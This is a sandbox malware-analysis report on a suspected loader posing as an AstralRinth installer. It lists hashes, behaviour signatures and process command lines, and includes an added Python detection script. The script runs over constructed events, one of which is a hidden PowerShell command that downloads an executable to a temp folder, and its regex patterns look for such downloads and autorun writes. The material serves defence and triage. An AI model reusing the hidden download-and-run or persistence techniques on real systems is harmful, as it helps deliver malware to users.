URL:

https://github.com/DIDIRUS4/AstralRinth/releases/download/ARF-v0.9.3/dirty__broken_AstralRinth.App_0.9.301_x64-setup.exe

Full analysis: https://app.any.run/tasks/d480470e-d819-458c-b7aa-f2ff0c3ecb19
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 14, 2025, 15:30:06
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
autorun-reg
Indicators:
MD5: 6F2C6C483CA34417ED4D42AAE6E99440
SHA1: 7DC088A9D07BBE9756CB0484FA72A9E9937CBF27
SHA256: A352DB6C58B237105EAE4BCEBB7A610A3BC5E0D2C3D6A34E7B71165D0621AF0E
SSDEEP: 3:N8tEd6GRKkWRQG0kC+0MNBbfALvGPKzonkA:2ugGKkWRP0WBbfAyionkA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 8248)
    • Changes the autorun value in the registry

      • MicrosoftEdgeUpdate.exe (PID: 8180)
    • The DLL Hijacking

      • msedgewebview2.exe (PID: 1012)
    • Scans artifacts that could help determine the target

      • msedgewebview2.exe (PID: 8840)
  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
    • The process creates files with name similar to system file names

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
    • Process drops legitimate windows executable

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdge_X64_134.0.3124.68.exe (PID: 1568)
      • setup.exe (PID: 8892)
    • Executable content was dropped or overwritten

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdge_X64_134.0.3124.68.exe (PID: 1568)
      • setup.exe (PID: 8892)
    • Starts a Microsoft application from unusual location

      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
    • Reads security settings of Internet Explorer

      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • ShellExperienceHost.exe (PID: 8776)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • msedgewebview2.exe (PID: 8840)
    • Disables SEHOP

      • MicrosoftEdgeUpdate.exe (PID: 4120)
    • Searches for installed software

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • setup.exe (PID: 8892)
    • There is functionality for taking screenshot (YARA)

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
    • Reads the Windows owner or organization settings

      • msiexec.exe (PID: 8404)
    • Executes as Windows Service

      • VSSVC.exe (PID: 8600)
    • Changes default file association

      • msiexec.exe (PID: 8404)
    • Starts process via Powershell

      • powershell.exe (PID: 8248)
    • Manipulates environment variables

      • powershell.exe (PID: 8248)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 8248)
    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 8248)
    • Starts itself from another location

      • MicrosoftEdgeUpdate.exe (PID: 8180)
    • Starts POWERSHELL.EXE for commands execution

      • msiexec.exe (PID: 8404)
    • The process bypasses the loading of PowerShell profile settings

      • msiexec.exe (PID: 8404)
    • Creates/Modifies COM task schedule object

      • MicrosoftEdgeUpdate.exe (PID: 8432)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 6980)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 9152)
    • Application launched itself

      • setup.exe (PID: 8892)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • msedgewebview2.exe (PID: 8840)
    • Creates a software uninstall entry

      • setup.exe (PID: 8892)
  • INFO

    • Application launched itself

      • firefox.exe (PID: 4620)
      • firefox.exe (PID: 3896)
    • Checks supported languages

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • ShellExperienceHost.exe (PID: 8776)
      • msiexec.exe (PID: 8404)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 6980)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 9152)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3016)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 5796)
      • setup.exe (PID: 8892)
      • setup.exe (PID: 2148)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
      • AstralRinth App.exe (PID: 840)
      • msedgewebview2.exe (PID: 8840)
      • msedgewebview2.exe (PID: 2692)
      • msedgewebview2.exe (PID: 1012)
      • msedgewebview2.exe (PID: 8636)
      • msedgewebview2.exe (PID: 8984)
    • The sample compiled with english language support

      • firefox.exe (PID: 3896)
      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdge_X64_134.0.3124.68.exe (PID: 1568)
      • setup.exe (PID: 8892)
    • Checks proxy server information

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • BackgroundTransferHost.exe (PID: 2692)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • wermgr.exe (PID: 3268)
      • powershell.exe (PID: 8248)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • msedgewebview2.exe (PID: 8840)
      • AstralRinth App.exe (PID: 840)
    • Reads the computer name

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • msiexec.exe (PID: 8404)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • MicrosoftEdgeUpdate.exe (PID: 8432)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 5796)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 6980)
      • MicrosoftEdgeUpdateComRegisterShell64.exe (PID: 9152)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • setup.exe (PID: 8892)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
      • msedgewebview2.exe (PID: 8840)
      • msedgewebview2.exe (PID: 1012)
      • msedgewebview2.exe (PID: 9152)
    • Executable content was dropped or overwritten

      • firefox.exe (PID: 3896)
      • msiexec.exe (PID: 6272)
      • msiexec.exe (PID: 8404)
    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 9184)
      • BackgroundTransferHost.exe (PID: 2692)
      • BackgroundTransferHost.exe (PID: 8612)
      • BackgroundTransferHost.exe (PID: 1760)
      • BackgroundTransferHost.exe (PID: 8920)
    • Create files in a temporary directory

      • AstralRinth.App_0.9.301_x64-setup.exe (PID: 9068)
      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
    • Creates files in the program directory

      • MicrosoftEdgeWebview2Setup.exe (PID: 8404)
    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 2692)
      • wermgr.exe (PID: 3268)
      • setup.exe (PID: 8892)
      • AstralRinth App.exe (PID: 840)
      • msedgewebview2.exe (PID: 8840)
      • msedgewebview2.exe (PID: 9152)
    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 2692)
      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • wermgr.exe (PID: 3268)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 3028)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
    • Process checks computer location settings

      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeUpdate.exe (PID: 8180)
      • setup.exe (PID: 8892)
      • msedgewebview2.exe (PID: 8984)
      • msedgewebview2.exe (PID: 8840)
    • Reads Environment values

      • MicrosoftEdgeUpdate.exe (PID: 4120)
      • MicrosoftEdgeUpdate.exe (PID: 8628)
      • MicrosoftEdgeUpdate.exe (PID: 6480)
      • AstralRinth App.exe (PID: 840)
      • msedgewebview2.exe (PID: 8840)
    • Manual execution by a user

      • msiexec.exe (PID: 6272)
    • Creates a software uninstall entry

      • msiexec.exe (PID: 8404)
    • Manages system restore points

      • SrTasks.exe (PID: 4692)
    • The executable file from the user directory is run by the Powershell process

      • MicrosoftEdgeWebview2Setup.exe (PID: 8108)
    • Autorun file from Registry key

      • MicrosoftEdgeUpdate.exe (PID: 8180)
    • Reads the machine GUID from the registry

      • MicrosoftEdgeUpdate.exe (PID: 3028)
    • Reads product name

      • AstralRinth App.exe (PID: 840)
    • Reads CPU info

      • msedgewebview2.exe (PID: 8840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
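The signature list above flags four behaviours that are worth turning into host detections: PowerShell started with an invisible window that downloads a file (PID 8248), an autorun value written by MicrosoftEdgeUpdate.exe (PID 8180), a write to DisableExceptionChainValidation under Image File Execution Options by PID 4120 (the modification events further down record the value written as 0; it is a value of 1 that switches SEHOP off for the named image, so the two cases should be scored differently), and Microsoft-named binaries started from outside the Windows and Program Files trees (the process table below shows the Edge updater and installer running from %LocalAppData%, which is where a per-user Edge install lives, so that hit is a lead to confirm with a signature check rather than a verdict on its own). The Python below is an added example, not part of the ANY.RUN report or of the AstralRinth project. The Sysmon-style event records, the PowerShell command line, the download URL, the SID and the Run value name are constructed, because the report does not show the actual command line or value name.

```python
"""Detections for the behaviours flagged in the report, run over constructed
Sysmon-style records (event ID 1 = process create, 13 = registry value set)."""
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional

EID_PROCESS_CREATE = 1
EID_REGISTRY_SET = 13
POWERSHELL = ("powershell.exe", "pwsh.exe")
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\[^\\]+$", re.I)
IFEO_SEHOP = re.compile(
    r"\\Image File Execution Options\\(?P<image>[^\\]+)\\DisableExceptionChainValidation$", re.I)
PS_HIDDEN = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I)
PS_DOWNLOAD = re.compile(
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|DownloadFile|DownloadString|Start-BitsTransfer", re.I)
MS_NAMED = re.compile(r"^(?:microsoftedge|msedge)", re.I)


@dataclass
class Event:
    event_id: int
    pid: int
    image: str
    command_line: str = ""
    parent_image: str = ""
    target_object: str = ""  # registry path (event 13)
    details: str = ""        # registry data as Sysmon renders it, e.g. "DWORD (0x00000001)"


def from_expected_dir(image: str) -> bool:
    """True when the binary runs from the Windows or Program Files trees."""
    return image.lower().startswith(
        ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\"))


def dword(details: str) -> Optional[int]:
    """Pull the integer out of Sysmon's 'DWORD (0x00000000)' rendering or a bare number."""
    m = re.search(r"0x([0-9a-f]+)", details, re.I)
    if m:
        return int(m.group(1), 16)
    m = re.search(r"\b\d+\b", details)
    return int(m.group(0)) if m else None


def check_event(ev: Event) -> List[str]:
    """Names of the detections that fire for one event; an empty list means none."""
    findings: List[str] = []
    name = ntpath.basename(ev.image).lower()
    parent = ntpath.basename(ev.parent_image).lower()
    if ev.event_id == EID_PROCESS_CREATE:
        if name in POWERSHELL:
            if PS_HIDDEN.search(ev.command_line):
                findings.append("powershell_hidden_window")
            if PS_DOWNLOAD.search(ev.command_line):
                findings.append("powershell_download")
        # "Starts a Microsoft application from unusual location": a lead to confirm
        # with an Authenticode check, since per-user Edge installs run from AppData.
        if MS_NAMED.match(name) and not from_expected_dir(ev.image):
            findings.append("microsoft_named_binary_unusual_location")
        if parent in POWERSHELL and "\\users\\" in ev.image.lower():
            findings.append("user_dir_executable_started_by_powershell")
    elif ev.event_id == EID_REGISTRY_SET:
        if RUN_KEY.search(ev.target_object):
            findings.append("autorun_registry_write")
        m = IFEO_SEHOP.search(ev.target_object)
        if m:
            # 1 switches SEHOP off for that image; 0 (what the report recorded) leaves it on.
            target, value = m.group("image").lower(), dword(ev.details)
            findings.append(f"sehop_disabled:{target}" if value == 1
                            else f"ifeo_sehop_write:{target}:value={value}")
    return findings


def triage(events: List[Event]) -> List[dict]:
    """Events with at least one finding, in input order."""
    return [{"pid": e.pid, "image": e.image, "findings": check_event(e)}
            for e in events if check_event(e)]


# Constructed records modelled on the report's process tree. The PowerShell command
# line, download URL, SID and Run value name are assumptions, not sandbox data.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EDGE_UPDATE = r"C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"
IFEO = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
SAMPLE_EVENTS = [
    Event(1, 8248, PS, parent_image=r"C:\Windows\System32\msiexec.exe",
          command_line=r'powershell.exe -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest '
                       r'https://example.invalid/MicrosoftEdgeWebview2Setup.exe -OutFile $env:TEMP\wv2.exe"'),
    Event(1, 8108, r"C:\Users\admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe", parent_image=PS),
    Event(13, 8180, EDGE_UPDATE, details=f'"{EDGE_UPDATE}" /c',
          target_object=r"HKU\S-1-5-21-1000-2000-3000-1001\Software\Microsoft\Windows\CurrentVersion\Run\ConstructedValueName"),
    Event(13, 4120, EDGE_UPDATE, details="DWORD (0x00000000)",
          target_object=IFEO + r"\MicrosoftEdgeUpdate.exe\DisableExceptionChainValidation"),
    Event(13, 4444, r"C:\Users\admin\AppData\Local\Temp\dropper.exe", details="DWORD (0x00000001)",
          target_object=IFEO + r"\target.exe\DisableExceptionChainValidation"),
    Event(1, 1234, r"C:\Windows\System32\notepad.exe", command_line="notepad.exe",
          parent_image=r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(hit["pid"], ntpath.basename(hit["image"]), ", ".join(hit["findings"]))
```

Real Sysmon event ID 1 and 13 records map onto `Event` field for field; the step that turns the "unusual location" lead into a verdict (an Authenticode check on the flagged binary) is deliberately left outside the block, since it needs the file itself rather than the log line.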
No Malware configuration.
No data.
All screenshots are available in the full report
Total processes: 200
Monitored processes: 53
Malicious processes: 11
Suspicious processes: 5

Behavior graph

start firefox.exe no specs firefox.exe firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs sppextcomobj.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs firefox.exe no specs slui.exe no specs astralrinth.app_0.9.301_x64-setup.exe no specs astralrinth.app_0.9.301_x64-setup.exe backgroundtransferhost.exe no specs microsoftedgewebview2setup.exe microsoftedgeupdate.exe backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs wermgr.exe backgroundtransferhost.exe no specs slui.exe shellexperiencehost.exe no specs msiexec.exe msiexec.exe msiexec.exe no specs vssvc.exe no specs srtasks.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs microsoftedgewebview2setup.exe microsoftedgeupdate.exe microsoftedgeupdate.exe no specs microsoftedgeupdatecomregistershell64.exe no specs microsoftedgeupdatecomregistershell64.exe no specs microsoftedgeupdatecomregistershell64.exe no specs microsoftedgeupdate.exe microsoftedgeupdate.exe no specs microsoftedgeupdate.exe microsoftedge_x64_134.0.3124.68.exe setup.exe setup.exe no specs microsoftedgeupdate.exe astralrinth app.exe msedgewebview2.exe no specs msedgewebview2.exe no specs msedgewebview2.exe no specs msedgewebview2.exe msedgewebview2.exe no specs msedgewebview2.exe no specs

Process information

Each entry lists PID, command line, path, parent process, user, integrity level, version and the first loaded modules.
PID: 840
CMD: "C:\Program Files\AstralRinth App\AstralRinth App.exe"
Path: C:\Program Files\AstralRinth App\AstralRinth App.exe
Parent process: msiexec.exe
User: admin
Integrity Level: MEDIUM
Description: AstralRinth App
Version: 0.9.3
Modules (images):
c:\program files\astralrinth app\astralrinth app.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
PID: 1012
CMD: "C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\admin\AppData\Local\AstralRinthApp\EBWebView" --webview-exe-name="AstralRinth App.exe" --webview-exe-version=0.9.3 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1824,i,8179137796848779574,12893299183909058846,262144 --enable-features=ForceSWDCompWhenDCompFallbackRequired,msAggressiveCacheTrimming,msCustomDataPartition,msWebView2NoTabForScreenShare,msWindowsTaskManager --disable-features=BackForwardCache,BackgroundTabLoadingFromPerformanceManager,CloseOmniboxPopupOnInactiveAreaClick,CollectAVProductsInfo,CollectCodeIntegrityInfo,EnableHangWatcher,FilterAdsOnAbusiveSites,GetWifiProtocol,LoginDetection,MediaFoundationCameraUsageMonitoring,PreconnectToSearch,SafetyHub,SegmentationPlatform,SpareRendererForSitePerProcess,Ukm,WebPayments,msAITrackerClassification,msAbydosForWindowlessWV2,msAffirmVirtualCard,msAllowChromeWebstore,msAllowMSAPrtSSOForNonMSAProfile,msApplicationGuard,msAskBeforeClosingMultipleTabs,msAutoToggleAADPrtSSOForNonAADProfile,msAutofillEdgeCoupons,msAutofillEdgeCouponsAutoApply,msAutofillEdgeServiceRequest,msAutomaticTabFreeze,msBrowserSettingsSupported,msCoarseGeolocationService,msDataProtection,msDesktopMode,msDesktopRewards,msDisableVariationsSeedFetchThrottling,msEEProactiveHistory,msEdgeAdPlatformUI,msEdgeAddWebCapturetoCollections,msEdgeAutofillAdvancedSuggestionsBasic,msEdgeAutofillOneClickAutocomplete,msEdgeAutofillSaveGSPR100InDb,msEdgeAutofillSs,msEdgeBrowserEssentialsShowUpdateSection,msEdgeCloudConfigService,msEdgeCloudConfigServiceV2,msEdgeCohorts,msEdgeCollectionsPrismExperiment1,msEdgeCollectionsPrismOverallMigration,msEdgeComposeNext,msEdgeEnableNurturingFramework,msEdgeEnclavePrefsBasic,msEdgeEnclavePrefsNotification,msEdgeFaviconService,msEdgeHJTelemetry,msEdgeHubAppSkype,msEdgeImageEditorUI,msEdgeLinkDoctor,msEdgeMouseGestureDefaultEnabled,msEdgeMouseGestureSupported,msEdgeNewDeviceFre,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgePDFCMHighlightUX,msEdgePasswordIris,msEdgePasswordIrisSaveBubble,msEdgeProngPersonalization,msEdgeReadingView,msEdgeRose,msEdgeSendTabToSelf,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingPersistentStorage,msEdgeShoppingPersonalizedCashbackBingHeader,msEdgeShoppingUI,msEdgeSmartFind,msEdgeSuperDragDefaultEnabled,msEdgeSuperDragDropSupported,msEdgeTipping,msEdgeTranslate,msEdgeUseCaptivePortalService,msEnableCustomJobMemoryLimitsOnXbox,msEnableMIPForPDF,msEnablePdfUpsell,msEnableThirdPartyScanning,msEnableWebSignInCta,msEnableWebToBrowserSignIn,msEndpointDlp,msEntityExtraction,msExtensionTelemetryFramework,msExternalTaskManager,msFileSystemAccessDirectoryIterationBlocklistCheck,msForceBrowserSignIn,msForeignSessionsPage,msGeolocationAccessService,msGeolocationOSLocationPermissionFallback,msGeolocationSQMService,msGeolocationService,msGrowthInfraLaunchSourceLogging,msGuidedSwitchAllowed,msHubPinPersist,msImplicitSignin,msIrm,msIrmv2,msKlarnaVirtualCard,msLoadStatistics,msLogIsEdgePinnedToTaskbarOnLaunch,msMIPCrossTenantPdfViewSupport,msMdatpWebSiteDlp,msNotificationPermissionForPWA,msOnHoverSearchInSidebar,msOpenOfficeDocumentsInWebViewer,msPasswordBreachDetection,msPdfAnnotationsVisibility,msPdfDataRecovery,msPdfDigitalSignatureRead,msPdfFreeText,msPdfFreeTextForCJK,msPdfHighlightMode,msPdfInking,msPdfKeyphraseSupport,msPdfOOUI,msPdfPopupMarkerRenderer,msPdfShare,msPdfSharedLibrary,msPdfTextNote,msPdfTextNoteMoreMenu,msPdfThumbnailCache,msPdfUnderside,msPdfViewRestore,msPersonalizationUMA,msPriceComparison,msPromptDefaultHandlerForPDF,msReactiveSearch,msReadAloud,msReadAloudPdf,msRedirectToShoreline,msRevokeExtensions,msSaasDlp,msShoppingTrigger,msShorelineSearch,msShorelineSearchFindOnPageWebUI,msShowOfflineGameEntrance,msShowReadAloudIconInAddressBar,msShowUXForAADPrtSSOForNonAADProfile,msSmartScreenProtection,msSuspendMessageForNewSessionWhenHavingPendingNavigation,msSyncEdgeCollections,msTabResourceStats,msTokenizationAutofillInlineEnabled,msTouchMode,msTriggeringSignalGenerator,msUserUnderstanding,msVideoSuperResolutionUI,msWalletBuyNow,msWalletCheckout,msWalletDiagnosticDataLogger,msWalletHubEntry,msWalletHubIntlP3,msWalletPartialCard,msWalletPasswordCategorization,msWalletPasswordCategorizationPlatformExpansion,msWalletTokenizationCardMetadata,msWalletTokenizedAutofill,msWebAssist,msWebAssistHistorySearchService,msWebOOUI,msWindowsUserActivities,msZipPayVirtualCard --variations-seed-version --mojo-platform-channel-handle=1812 /prefetch:2
Path: C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe
Parent process: msedgewebview2.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Edge WebView2
Version: 134.0.3124.68
Modules (images):
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedgewebview2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1568
CMD: "C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\MicrosoftEdge_X64_134.0.3124.68.exe" --msedgewebview --verbose-logging --do-not-launch-msedge --user-level
Path: C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\MicrosoftEdge_X64_134.0.3124.68.exe
Parent process: MicrosoftEdgeUpdate.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge Installer
Exit code: 0
Version: 134.0.3124.68
Modules (images):
c:\users\admin\appdata\local\microsoft\edgeupdate\install\{6124428d-bf80-450d-9a94-c7d3e4a1a174}\microsoftedge_x64_134.0.3124.68.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\shell32.dll
PID: 1760
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Download/Upload Host
Exit code: 1
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 2148
CMD: C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\EDGEMITMP_93ED6.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=134.0.6998.89 --annotation=exe=C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\EDGEMITMP_93ED6.tmp\setup.exe --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=134.0.3124.68 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff76956dd48,0x7ff76956dd54,0x7ff76956dd60
Path: C:\Users\admin\AppData\Local\Microsoft\EdgeUpdate\Install\{6124428D-BF80-450D-9A94-C7D3E4A1A174}\EDGEMITMP_93ED6.tmp\setup.exe
Parent process: setup.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge Installer
Exit code: 0
Version: 134.0.3124.68
Modules (images):
c:\users\admin\appdata\local\microsoft\edgeupdate\install\{6124428d-bf80-450d-9a94-c7d3e4a1a174}\edgemitmp_93ed6.tmp\setup.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
PID: 2552
CMD: C:\WINDOWS\System32\slui.exe -Embedding
Path: C:\Windows\System32\slui.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Activation Client
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
PID: 2692
CMD: "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
Path: C:\Windows\System32\BackgroundTransferHost.exe
Parent process: svchost.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Download/Upload Host
Exit code: 1
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
PID: 2692
CMD: C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe --type=crashpad-handler --user-data-dir=C:\Users\admin\AppData\Local\AstralRinthApp\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\admin\AppData\Local\AstralRinthApp\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=134.0.6998.89 --annotation=exe=C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=134.0.3124.68 --initial-client-data=0x188,0x18c,0x190,0x164,0x198,0x7ffc85b73140,0x7ffc85b7314c,0x7ffc85b73158
Path: C:\Users\admin\AppData\Local\Microsoft\EdgeWebView\Application\134.0.3124.68\msedgewebview2.exe
Parent process: msedgewebview2.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Edge WebView2
Version: 134.0.3124.68
Modules (images):
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedgewebview2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\users\admin\appdata\local\microsoft\edgewebview\application\134.0.3124.68\msedge_elf.dll
